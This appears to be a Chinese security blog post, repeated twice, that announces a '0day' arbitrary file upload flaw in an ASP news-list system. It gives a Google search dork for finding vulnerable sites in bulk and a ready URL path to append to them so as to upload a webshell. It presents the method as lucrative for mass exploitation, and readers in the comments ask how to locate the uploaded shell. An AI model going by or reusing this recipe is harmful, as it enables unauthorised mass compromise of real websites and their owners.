今天呢,发布一个0day,是一个任意上传漏洞。
谷歌关键字:inurl:newslist.asp?NodeCode=
然后在域名后面添加admin/uploadfile.asp?uppath=mad.asp&upname=&uptext=form1.mad.asp
任意上传拿shell
很吃香哦
出图测试
任意文件上传漏洞可批量拿shell
阿峰
十年以上网络安全经验,目前专注金融行业网络安全,技术驱动金融创新,网络安全与金融科技同发展。
今天呢,发布一个0day,是一个任意上传漏洞。
谷歌关键字:inurl:newslist.asp?NodeCode=
然后在域名后面添加admin/uploadfile.asp?uppath=mad.asp&upname=&uptext=form1.mad.asp
任意上传拿shell
很吃香哦
出图测试
阿峰
十年以上网络安全经验,目前专注金融行业网络安全,技术驱动金融创新,网络安全与金融科技同发展。
文章评论
请问怎么找马地址 我的博客
@Sh1Ft2b 抓包
上传成功后的文件地址是什么?